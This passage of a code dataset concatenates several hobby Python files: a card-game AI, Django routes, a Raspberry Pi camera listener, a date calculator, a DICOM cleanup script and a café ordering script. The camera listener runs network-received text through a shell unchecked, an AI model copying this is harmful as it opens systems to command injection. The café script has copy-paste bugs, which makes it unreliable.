inp.input_loop(self.game.ai_player.nb_cards, msg='Which card do you wanna see? ', accept_indexes=True, accept_commands=True)\n if inp.is_quit_key:\n break\n hidden_card_index = inp.value\n super()._trigger_queen_effect(hidden_card_index)\n self.display_cards(visible_cards=[hidden_card_index])\n self.game.set_should_display_cards(False)\n\n def display_cards(self, visible_cards: List[int]=[]):\n print(Colors.BOLD)\n print('Your cards')\n super().display_cards(visible_cards=visible_cards)\n\n def _display_deck_card(self, card: Card):\n print(Colors.OKCYAN)\n super()._display_deck_card(card)\n\nclass AIPlayer(PlayerI):\n def __init__(self, game):\n super().__init__(game)\n\n def play(self, deck_card):\n def get_best_hit_index(cards: List[Card], rank_to_ignore: Rank=None) -> int:\n \"\"\" returns the index of the card with the worst value.\n Does not take into account the duplicates.\n \"\"\"\n worst, worst_idx = cards[0].rank.value, 0\n for i in range(1, len(cards)):\n c = cards[i]\n # if we have a queen and we also have 1 or more hidden cards\n if c.rank == Rank.QUEEN and len(self._hidden_cards) >= 1:\n return i\n occurences = self.game.nb_occurences_in_deck(c.rank)\n # if only 1 or 2 card are remaining in the deck\n if occurences in [1, 2] and not is_a_great_card(c):\n return i\n # get rank with highest value\n if c.rank.value > worst and c.rank != rank_to_ignore:\n worst, worst_idx = c.rank.value, i\n return worst_idx\n\n def get_worst_combinaison_of_cards_index(cards: List[Card]) -> int:\n \"\"\" returns the index of the card which when played\n will lose the most points. 
Takes into account the duplicate\n            cards which will lose more points.\n            \"\"\"\n            card_values = defaultdict(int)\n            for i in range(len(cards)):\n                c = cards[i]\n                card_values[c.rank.value] += c.rank.value\n            max_combinaison_rank = max(card_values.items(), key=operator.itemgetter(1))[0]\n            print(card_values.items())\n            print(max_combinaison_rank)\n            first_idx = next(i for i in range(len(cards)) if cards[i].rank.value == max_combinaison_rank)\n            return first_idx\n\n        def get_first_card_index(cards: List[Card], rank: Rank) -> int:\n            for i in range(len(cards)):\n                if cards[i].rank == rank:\n                    return i\n            return -1\n\n        def get_random_card_index(\n            cards: List[Card], \n            do_not_choose_indexes: List[int]=[]\n        ) -> int:\n            \"\"\" returns a pseudo random index from list of cards;\n            some `do_not_choose_indexes` can be provided to avoid\n            peeking the same card multiple times.\n            \"\"\"\n            if len(cards) == 0:\n                return 0\n            for i in range(len(cards)):\n                if i not in do_not_choose_indexes:\n                    return i\n            return random.randint(0, len(cards) - 1)\n\n        def get_hidden_card_index(cards: List[Card]) -> int:\n            \"\"\" returns the first index of a hidden card in `cards` or -1.\n            \"\"\"\n            return next(iter(self._hidden_cards)) if len(self._hidden_cards) > 0 else -1\n\n        def apply_card_effects(\n            thrown_cards: List[Card], \n            cards: List[Card],\n            other_player_cards: List[Card],\n            deck_card: Card):\n            def apply_jack_effect(thrown_cards: List[Card], cards: List[Card], other_player_cards: List[Card]):\n                \"\"\" apply effect on all jack cards.\n                \"\"\"\n                already_peeked_indexes = []\n                for c in thrown_cards:\n                    if c.rank == Rank.JACK and self.game.player.is_kobo: # only use the jack when the other player has called kobo\n                        random_index = get_random_card_index(other_player_cards, already_peeked_indexes)\n                        already_peeked_indexes.append(random_index)\n                        worst_card_idx = get_worst_combinaison_of_cards_index(cards)\n                        self._trigger_jack_effect(worst_card_idx, random_index, other_player_cards)\n\n            def apply_queen_effect(thrown_cards: List[Card], cards: List[Card], deck_card: Card):\n                \"\"\" apply effect on all queen cards.\n                \"\"\"\n                cards = cards.copy() + [deck_card]\n                for c in thrown_cards:\n                    if c.rank == Rank.QUEEN:\n                        for i in range(len(cards)):\n                            card = cards[i]\n                            if not card.is_discovered():\n                                print(f'DISCOVER {card}')\n                                self._trigger_queen_effect(i)\n                                break\n\n            apply_jack_effect(thrown_cards, cards, other_player_cards)\n            apply_queen_effect(thrown_cards, cards, deck_card)\n\n        def is_a_great_card(card: Card) -> bool:\n            r = card.rank\n            return r == Rank.TEN or r == Rank.ACE or r == Rank.TWO\n\n        def check_kobo(cards: List[Card]) -> bool:\n            for c in cards:\n                if not is_a_great_card(c):\n                    return False\n            return True\n        \n        def throw_deck_card(deck_card: Card):\n            \"\"\" plays the peeked deck card.\n            Applies substitutions and effects on cards.\n            \"\"\"\n            thrown_cards = self._do_not_substitute_card(deck_card)\n            apply_card_effects(thrown_cards, self.cards, self.game.player.cards, deck_card)\n            if check_kobo(self.cards):\n                self.is_kobo = True\n            return thrown_cards\n\n        def throw_player_card(card_index: int, deck_card: Card):\n            \"\"\" plays a card within the cards of the player.\n            Applies substitutions and effects on cards.\n            \"\"\"\n            thrown_cards = self._substitute_card(card_index, deck_card)\n            apply_card_effects(thrown_cards, self.cards, self.game.player.cards, deck_card)\n            if check_kobo(self.cards):\n                self.is_kobo = True\n            return thrown_cards\n\n\n        player = self.game.player\n        cards = [c for c in self.cards if c.is_discovered()]\n        hidden_card_index = get_hidden_card_index(self.cards)\n\n        # 
handle kobo\n        if player.is_kobo:\n            if deck_card.rank == Rank.JACK: # deck card is jack\n                return throw_deck_card(deck_card)\n            else:\n                jack_index = get_first_card_index(cards, Rank.JACK)\n                if jack_index != -1: # found a jack in cards\n                    return throw_player_card(jack_index, deck_card)\n        \n        # handle queen\n        if deck_card.rank == Rank.QUEEN:\n            print('QUEEN DECK')\n            return throw_deck_card(deck_card)\n        else:\n            queen_index = get_first_card_index(cards, Rank.QUEEN)\n            if queen_index != -1: # found a queen\n                if hidden_card_index != -1: # found 1 hidden card\n                    print('QUEEN CARDS')\n                    return throw_player_card(queen_index, deck_card)\n\n        # handle discovering hidden cards\n        if hidden_card_index != -1: # found a hidden card\n            print('HIDDEN')\n            return throw_player_card(hidden_card_index, deck_card)\n        \n        # handle the case where every card is great\n        cards_with_deck_card = cards + [deck_card]\n        best_hit_index = get_best_hit_index(cards_with_deck_card)\n        best_hit_card = cards_with_deck_card[best_hit_index]\n        if is_a_great_card(best_hit_card): # all cards are great\n            self.is_kobo = True\n            best_hit_index = get_worst_combinaison_of_cards_index(cards_with_deck_card)\n            if best_hit_index == len(cards_with_deck_card) - 1: # best hit is the deck card\n                print('KOBO DECK')\n                return throw_deck_card(deck_card)\n            else:\n                print('KOBO CARDS')\n                return throw_player_card(best_hit_index, deck_card)\n\n        # handle deck card is a card we already have\n        deck_card_index = get_first_card_index(cards, deck_card.rank)\n        if deck_card_index != -1 and not is_a_great_card(deck_card):\n            print('ALREADY HAVE THIS CARD')\n            return throw_deck_card(deck_card)\n\n        # default turn\n        best_hit_index = get_best_hit_index(cards_with_deck_card)\n        if best_hit_index == len(cards_with_deck_card) - 1: # best hit is the deck card\n            print('CLASSIC DECK')\n            return throw_deck_card(deck_card)\n        else:\n            print('CLASSIC CARDS')\n            return throw_player_card(best_hit_index, deck_card)\n        \n\n    def display_cards(self, visible_cards: List[int]=[]):\n        print(Colors.BOLD)\n        print(Colors.FAIL)\n        print('AI cards')\n        super().display_cards(visible_cards=visible_cards)\n        print(Colors.ENDC)\n\n    def _display_deck_card(self, card: Card):\n        print(Colors.FAIL)\n        super()._display_deck_card(card)\n\n\ng = Game()\ng.launch()","repo_name":"TristanBilot/kobo_ai","sub_path":"kobo_ai.py","file_name":"kobo_ai.py","file_ext":"py","file_size_in_byte":21124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33688094768","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n path('site-admin/', views.admin, name='system-admin'),\n path('', views.home_view, name='home'),\n path('about/', views.about, name='about'),\n path('contact/', views.contact, name='contact'),\n path('success/', views.success, name='success'),\n path('car-hiring//', views.car_hiring_detail, name='hiring-detail'),\n path('page-not-found/', views.four_or_four_page, name='page-not-found'),\n path('car-hire-success/', views.car_hire_success, name='car-success'),\n path('room-book-success/', views.room_success, name='room-success'),\n path('gen-pdf/', views.generate_pdf, name='gen-pdf'),\n path('gen-pdf/', views.generate_pdf_room, name='gen-pdf-room'),\n path('car-hirings/', views.car_hirings, name='hirings'),\n path('room-bookings/', views.room_bookings, name='bookings'),\n path('room-bookings//', views.room_booking_detail, name='booking-detail'),\n\n path('logout/', views.logout_view, name='logout'),\n path('login/', views.admin_login, name='login'),\n]","repo_name":"Chaumulusa/money","sub_path":"src/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5656185810","text":"#!/usr/bin/python\n# socket code adapted from Richard Garsthagen's scripts at pi3dscan.com\n# NOTE: look into python socketserver module or tornado library to handle sockets\n# 12/19/16\n\nimport socket\nimport struct\nimport subprocess\nimport time\nimport datetime\nimport picamera\n\npixels = (2592, 1944)\nframerate = 1\nled = False\nvflip = True\nhflip = True\nmeter_mode = 'backlit'\niso = 100\n\n\ndef config_socket():\n MCAST_GRP = '225.1.1.1'\n MCAST_PORT = 3179\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # '' is a symbolic name for host parameter that means all available interfaces\n sock.bind(('', MCAST_PORT))\n mreq = struct.pack(\"4sl\", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n\n return sock\n\ndebug = 1 # Turn debug message on/off\n\n\nif __name__ == '__main__':\n sock = config_socket()\n\n while True:\n print(\"listening...\")\n data = sock.recv(10240).decode()\n rdata = data[1:]\n rcmd = ord(data[0])\n\n if debug == 1:\n print(\"Received cmd: {}\".format(str(rcmd)))\n print(\"Data: {}\".format(rdata))\n\n if rcmd == 1 and rdata:\n print(\"shooting still @ {}\".format(datetime.datetime.now().strftime(\"%H:%M:%S\")))\n cmd = \"raspistill \" + rdata\n pid = subprocess.call(cmd, shell=True)\n print(\"done shooting still @ {}\\n\".format(datetime.datetime.now().strftime(\"%H:%M:%S\")))\n\n elif rcmd == 1:\n with picamera.PiCamera(resolution=pixels, framerate=framerate) as picam:\n picam.iso = iso\n picam.led = led\n picam.vflip = vflip\n picam.hflip = hflip\n picam.meter_mode = meter_mode\n\n print(\"calibrating picam instance\")\n time.sleep(5)\n\n print(\"shooting still @ {}\".format(datetime.datetime.now().strftime(\"%H:%M:%S\")))\n picam.capture('/home/pi/tests/socket_pics/test02-{}.jpg'.format(socket.gethostname()))\n print(\"done shooting still @ {}\\n\".format(datetime.datetime.now().strftime(\"%H:%M:%S\")))\n","repo_name":"barlaensdoonn/photogrammetric-timelapse","sub_path":"old_sockets/picnic.py","file_name":"picnic.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} 
+{"seq_id":"70016434669","text":"from dataclasses import dataclass\n\n\ndef get_max_day(year, month):\n\n if month in (1, 3, 5, 7, 8, 10, 12):\n max_day = 31\n elif month in (4, 6, 9, 11):\n max_day = 30\n else:\n if not year % 100:\n if not year % 400:\n max_day = 29\n else:\n max_day = 28\n elif not year % 4:\n max_day = 29\n else:\n max_day = 28\n return max_day\n\n\n@dataclass\nclass Date:\n year: int\n month: int\n day: int\n\n def increment(self):\n\n year, month, day = self.year, self.month, self.day\n\n max_day = get_max_day(year, month)\n\n # perform the increment\n if day + 1 > max_day:\n day = 1\n if month < 12:\n month += 1\n else:\n month = 1\n year += 1\n else:\n day = day + 1\n\n # save\n self.year, self.month, self.day = year, month, day\n\n def __gt__(self, other):\n return 1000 * self.year + 50 * self.month + self.day > \\\n 1000 * other.year + 50 * other.month + other.day\n\n def validate(self):\n return all([self.month > 0, self.month <= 12, get_max_day(self.year, self.month) >= self.day])\n\n\ndef parse(strfdate):\n d, m, y = strfdate.split('/')\n return Date(year=int(y), month=int(m), day=int(d))\n\n\ndef calculate(date_from, date_to):\n date_0, date_1 = parse(date_from), parse(date_to)\n\n if date_0 > date_1:\n date_0, date_1 = date_1, date_0\n\n delta = 0\n\n while date_1 != date_0:\n delta += 1\n date_0.increment()\n # DEBUG\n # print(f\"{date_0.year}-{date_0.month}-{date_0.day}\")\n\n return delta - 1\n","repo_name":"gotexis/test-sypht","sub_path":"date/date_calculate.py","file_name":"date_calculate.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23255026609","text":"import os\nimport sys\nimport argparse\nimport time\nfrom dataset import RSNAIntracranialDataset, normalized_dicom_pixels\nimport pydicom\n\nparser = argparse.ArgumentParser(\n description='Remove corrupted DICOM')\nparser.add_argument('--dir', '-d',\n dest=\"dir\",\n metavar='DIR',\n help='path to directory containing dcm files',\n default='E:/cq500')\nparser.add_argument('--log_interval',\n dest=\"log_interval\",\n metavar='LOG_INTERVAL',\n help='how often to print updates to stdout',\n default=1000)\nargs = parser.parse_args()\n\nprint(f'Removing corrupted DICOM files at {args.dir}')\n\nstart = time.time()\n\nfiles = [os.path.join(dp, f)\n for dp, dn, fn in os.walk(os.path.expanduser(args.dir))\n for f in fn\n if f.endswith('.dcm')]\n\nprint(f'Processing {len(files)} files...')\n\nnum_removed = 0\nfor i, file in enumerate(files):\n try:\n x = pydicom.dcmread(file, stop_before_pixels=False)\n x = normalized_dicom_pixels(x)\n if x.shape != (1, 512, 512):\n raise ValueError('wrong shape')\n except:\n path = os.path.join(args.dir, file)\n os.remove(path)\n num_removed += 1\n print(f'Removed corrupted {path}: {sys.exc_info()}')\n if i > 0 and i % args.log_interval == 0:\n print(f'Processed {i}/{len(files)}')\n\nelapsed = time.time() - start\nprint(f'Removed {num_removed} corrupt examples in {elapsed} seconds')\n","repo_name":"thavlik/machine-learning-portfolio","sub_path":"src/remove-corrupt-dcm.py","file_name":"remove-corrupt-dcm.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"16451874197","text":"import requests\r\nfrom datetime import datetime\r\n\r\nfrom db_mufap import MFDatabase\r\n\r\ndb = MFDatabase()\r\n# db.update_fundlist()\r\ncutoff_date = datetime(2023, 7, 
22)\r\ndb.update_attached(cutoff_date)\r\n\r\n\r\n\r\n# upload\r\nusername = 'msaadat'\r\ntoken = '##########################'\r\n\r\nfl = db.path_db_attach.name\r\ndest = f\"https://www.pythonanywhere.com/api/v0/user/{username}/files/path/home/{username}/mysite/{fl}\"\r\n\r\nf = open(fl,'rb')\r\ncontent = f.read()\r\nf.close()\r\nresponse = requests.post(\r\n dest,\r\n files={'content': content},\r\n headers={'Authorization': f'Token {token}'}\r\n)\r\n\r\nprint(response)\r\n\r\n# merge local \r\ndb.merge_attached(cutoff_date)\r\ndb.path_db_attach.unlink()\r\n\r\n# merge on server\r\n\r\nresponse = requests.post(\r\n \"http://msaadat.pythonanywhere.com/merge\",\r\n # \"http://localhost:8000/merge\",\r\n json={'cutoff_date': cutoff_date.isoformat()},\r\n)\r\n\r\nprint(response.content)\r\n\r\ndb.close()","repo_name":"msaadat/mfperf","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6215003723","text":"from os import system\r\nimport datetime\r\n\r\n#2109106039\r\n\r\nHargaTotal = 0\r\nDiskon = 0\r\nIntro = 0\r\nMenuAwal = 0\r\nMakanan = 0\r\nMinuman = 0\r\nPesanan = {}\r\nPesananCair = {}\r\n\r\nday = datetime.datetime.today().weekday()\r\nif day <= 4:\r\n Diskon += 10\r\nelse:\r\n Diskon += 5\r\n\r\n#IC = Ivory Coins, Mata uang negara entah negara mana ini\r\n\r\ndef Banner():\r\n print(100 * \"*\")\r\n print(\"\\033[1;36;40mCafé Pour La Tâche\\033[0;37;40m\".center(100, \" \"))\r\n print(100 * \"*\")\r\n\r\ndef clear():\r\n _ = system('cls')\r\n_ = system('')\r\n \r\n\r\nwhile MenuAwal == 0:\r\n if Intro == 0:\r\n print(100 * \"*\")\r\n print(\"\\033[1;36;40mWelcome to our Café, Comrade!\\033[0;37;40m\".center(100, \" \"))\r\n print(100 * \"*\")\r\n\r\n print(\"\\n\\033[0;33;40m V: \\\"Saya, Viabel, akan membimbing Anda dalam melakukan pemesanan~\\\"\\033[0;37;40m\\n\")\r\n Intro += 1\r\n else:\r\n Banner()\r\n\r\n print(\"\"\" Berikut Opsi Jenis Menu yang dapat Anda pilih:\r\n [1] Menu Makanan\r\n [2] Menu Minuman\r\n [3] Menu Pembayaran\"\"\")\r\n print(\"\\033[0;33;40m V: \\\"Ketik angka di depan menu, contoh: 1 (untuk makanan)\\\"\\033[0;37;40m\")\r\n Home = input(\" Pilihan saya: \")\r\n if Home == \"1\":\r\n Food = 0\r\n while Food == 0:\r\n clear()\r\n Banner()\r\n print(\"\"\" Berikut Daftar Makanan beserta Harganya:\r\n [1] Strawberry Parfait\\t [10 IC]\\t <-- Recommendation\r\n [2] Red Velvet Cake\\t [13 IC]\r\n [3] Dark Chocolate Cake\\t [14 IC]\r\n [4] Summery Fruit Salad\\t [ 8 IC]\r\n [5] Black Sesame Tart\\t [10 IC]\r\n [6] Chocolate Truffle\\t [ 4 IC]\r\n \"\"\")\r\n print(\"\\033[0;33;40m V: \\\"Pembelian 2 makanan atau lebih bisa dapat diskon 5% loh!\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Ketik angka di depan menu, contoh: 1 (untuk parfait)\\\"\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Untuk mengubah pesanan, pilih kembali pesanan dan ketik jumlah yang diinginkan\\\"\\033[0;37;40m\")\r\n print(\"\\033[0;33;40m V: \\\"Ketik \\\"Kembali\\\" atau \\\"0\\\" untuk kembali ke daftar menu utama\\033[0;37;40m\")\r\n\r\n FoodChoice = str(input(\" Pilihan saya: \"))\r\n\r\n if FoodChoice == \"1\":\r\n if 'Strawberry Parfait' in Pesanan:\r\n HargaTotal -= 10 * SParf\r\n Makanan -= SParf\r\n Pesanan.pop('Strawberry Parfait') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n SParf = int(input(\" Berapa banyak pesanan Anda? 
\"))\r\n if SParf >= 1:\r\n Pesanan['Strawberry Parfait'] = SParf\r\n HargaTotal += 10 * SParf\r\n Makanan += SParf\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"2\":\r\n if 'Red Velvet Cake' in Pesanan:\r\n HargaTotal -= 13 * RVCake\r\n Makanan -= RVCake\r\n Pesanan.pop('Red Velvet Cake') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n RVCake = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if RVCake >= 1:\r\n Pesanan['Red Velvet Cake'] = RVCake\r\n HargaTotal += 13 * RVCake\r\n Makanan += RVCake\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"3\":\r\n if 'Dark Chocolate Cake' in Pesanan:\r\n HargaTotal -= 14 * DCCake\r\n Makanan -= DCCake\r\n Pesanan.pop('Dark Chocolate') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n DCCake = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if DCCake >= 1:\r\n Pesanan['Dark Chocolate Cake'] = DCCake\r\n HargaTotal += 14 * DCCake\r\n Makanan += DCCake\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"4\":\r\n if 'Summery Fruit Salad' in Pesanan:\r\n HargaTotal -= 8 * SFSalad\r\n Makanan -= SFSalad\r\n Pesanan.pop('Summery Fruit Salad') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n SFSalad = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if SFSalad >= 1 :\r\n Pesanan['Summery Fruit Salad'] = SFSalad\r\n HargaTotal += 8 * SFSalad\r\n Makanan += SFSalad\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"5\":\r\n if 'Black Sesame Tart' in Pesanan:\r\n HargaTotal -= 10 * BSTart\r\n Makanan -= BSTart\r\n Pesanan.pop('Black Sesame Tart') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n BSTart = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if BSTart >= 1:\r\n Pesanan['Black Sesame Tart'] = BSTart\r\n HargaTotal += 10 * BSTart\r\n Makanan += BSTart\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice == \"6\":\r\n if 'Chocolate Truffle' in Pesanan:\r\n HargaTotal -= 4 * CTruff\r\n Makanan -= CTruff\r\n Pesanan.pop('Chocolate Truffle') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n CTruff = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if CTruff >= 1:\r\n Pesanan['Chocolate Truffle'] = CTruff\r\n HargaTotal += 4 * CTruff\r\n Makanan += CTruff\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif FoodChoice.casefold() == \"kembali\" or FoodChoice == \"0\":\r\n clear()\r\n break\r\n\r\n else:\r\n print(\"\\n\\033[0;33;40m V: \\\"Hei.. 
Kami tidak memiliki menu rahasia seperti yang Anda pikirkan..\\\"\\033[0;37;40m\")\r\n                input()\r\n                clear()\r\n            \r\n\r\n            \r\n\r\n    elif Home == \"2\":\r\n        Drink = 0\r\n        while Drink == 0:\r\n            clear()\r\n            Banner()\r\n            print(\"\"\" Berikut Daftar Minuman beserta Harganya:\r\n            [1] Mineral Water\\t [1 IC]\r\n            [2] Dalgona Coffee\\t [4 IC]\r\n            [3] Mixed Fruits Juice\\t [2 IC]\r\n            [4] Mixed Veggies Juice\\t [2 IC]\r\n            [5] Thai Tea \\t\\t [4 IC]\r\n            [6] White Coffee\\t [3 IC] <-- Recommendation\r\n            [7] Irish Coffee\\t\\t [4 IC] <-- Recommendation\r\n            [8] Caffé Latte\\t\\t [3 IC]\r\n            [9] Espresso Macchiato\\t [3 IC]\r\n            [10] Lemon Squash\\t [3 IC] \r\n            [11] O (Coffee)\\t\\t [2 IC]\r\n            [12] Valencia Fizz\\t [3 IC]\r\n            [13] Electrolyte Drinks\\t [7 IC]\r\n            \"\"\")\r\n            print(\"\\033[0;33;40m V: \\\"Pembelian 3 minuman atau lebih bisa dapat diskon 10% loh!\\033[0;37;40m\")\r\n            print(\"\\033[0;33;40m V: \\\"Ketik angka di depan menu, contoh: 1 (untuk Mineral Water)\\\"\\033[0;37;40m\")\r\n            print(\"\\033[0;33;40m V: \\\"Untuk mengubah pesanan, pilih kembali pesanan dan ketik jumlah yang diinginkan\\\"\\033[0;37;40m\")\r\n            print(\"\\033[0;33;40m V: \\\"Ketik \\\"Kembali\\\" atau \\\"0\\\" untuk kembali ke daftar menu utama\\033[0;37;40m\")\r\n\r\n            DrinkChoice = str(input(\" Pilihan saya: \"))\r\n\r\n            if DrinkChoice == \"1\":\r\n                if 'Mineral Water' in PesananCair:\r\n                    HargaTotal -= 1 * MWat\r\n                    Minuman -= MWat\r\n                    PesananCair.pop('Mineral Water') \r\n                print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n                MWat = int(input(\" Berapa banyak pesanan Anda? \"))\r\n                if MWat >= 1:\r\n                    PesananCair['Mineral Water'] = MWat\r\n                    HargaTotal += 1 * MWat\r\n                    Minuman += MWat\r\n                    print(\" Pesanan Ditambahkan!\")\r\n                input()\r\n                clear()\r\n\r\n            elif DrinkChoice == \"2\":\r\n                if 'Dalgona Coffee' in PesananCair:\r\n                    HargaTotal -= 4 * DCof \r\n                    Minuman -= DCof\r\n                    PesananCair.pop('Dalgona Coffee') \r\n                print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n                DCof = int(input(\" Berapa banyak pesanan Anda? \"))\r\n                if DCof >= 1:\r\n                    PesananCair['Dalgona Coffee'] = DCof\r\n                    HargaTotal += 4 * DCof\r\n                    Minuman += DCof\r\n                    print(\" Pesanan Ditambahkan!\")\r\n                input()\r\n                clear()\r\n            \r\n            elif DrinkChoice == \"3\":\r\n                if 'Mixed Fruits Juice' in PesananCair:\r\n                    HargaTotal -= 2 * MXJuice\r\n                    Minuman -= MXJuice\r\n                    PesananCair.pop('Mixed Fruits Juice') \r\n                print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n                MXJuice = int(input(\" Berapa banyak pesanan Anda? \"))\r\n                if MXJuice >= 1:\r\n                    PesananCair['Mixed Fruits Juice'] = MXJuice\r\n                    HargaTotal += 2 * MXJuice\r\n                    Minuman += MXJuice\r\n                    print(\" Pesanan Ditambahkan!\")\r\n                input()\r\n                clear()\r\n            \r\n            elif DrinkChoice == \"4\":\r\n                if 'Mixed Veggies Juice' in PesananCair:\r\n                    HargaTotal -= 2 * MVJuice\r\n                    Minuman -= MVJuice\r\n                    PesananCair.pop('Mixed Veggies Juice') \r\n                print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n                MVJuice = int(input(\" Berapa banyak pesanan Anda? 
\"))\r\n if MVJuice >= 1:\r\n PesananCair['Mixed Veggies Juice'] = MVJuice\r\n HargaTotal += 2 * MXJuice\r\n Minuman += MXJuice\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n \r\n elif DrinkChoice == \"5\":\r\n if 'Thai Tea' in PesananCair:\r\n HargaTotal -= 4 * TTea\r\n Minuman -= TTea\r\n PesananCair.pop('Thai Tea') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n TTea = int(input(\" Berapa banyak pesanan Anda?\"))\r\n if TTea >= 1:\r\n PesananCair['Thai Tea'] = TTea\r\n HargaTotal += 4 * TTea \r\n Minuman += TTea\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"6\":\r\n if 'White Coffee' in PesananCair:\r\n HargaTotal -= 3 * WCof \r\n Minuman -= WCof\r\n PesananCair.pop('White Coffee') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n WCof = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if WCof >= 1:\r\n PesananCair['White Coffee'] = WCof\r\n HargaTotal += 3 * WCof\r\n Minuman += WCof\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n \r\n elif DrinkChoice == \"7\":\r\n if 'Irish Coffee' in PesananCair:\r\n HargaTotal -= 4 * ICof \r\n Minuman -= ICof\r\n PesananCair.pop('Irish Coffee') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n ICof = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if ICof >= 1:\r\n PesananCair['Irish Coffee'] = ICof\r\n HargaTotal += 4 * ICof\r\n Minuman += ICof\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"8\":\r\n if 'Caffe Lattee' in PesananCair:\r\n HargaTotal -= 3 * CLatte\r\n Minuman -= CLatte\r\n PesananCair.pop('Caffe Latte') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n CLatte = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if CLatte >= 1:\r\n PesananCair['Caffe Latte'] = CLatte\r\n HargaTotal += 3 * CLatte\r\n Minuman += CLatte\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"9\":\r\n if 'Espresso Macchiato' in PesananCair:\r\n HargaTotal -= 3 * EMac\r\n Minuman -= EMac\r\n PesananCair.pop('Espresso Macchiato') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n EMac = int(input(\" Berapa banyak pesanan Anda? \"))\r\n if EMac >= 1:\r\n PesananCair['Espresso Macchiato'] = EMac\r\n HargaTotal += 3 * EMac\r\n Minuman += EMac\r\n print(\" Pesanan Ditambahkan!\")\r\n input()\r\n clear()\r\n\r\n elif DrinkChoice == \"10\":\r\n if 'Lemon Squash' in PesananCair:\r\n HargaTotal -= 3 * LSqua\r\n Minuman -= LSqua\r\n PesananCair.pop('Lemon Squash') \r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik dengan angka atau sistem kami akan melakukan usir paksa..\\\"\\033[0;37;40m\")\r\n LSqua = int(input(\" Berapa banyak 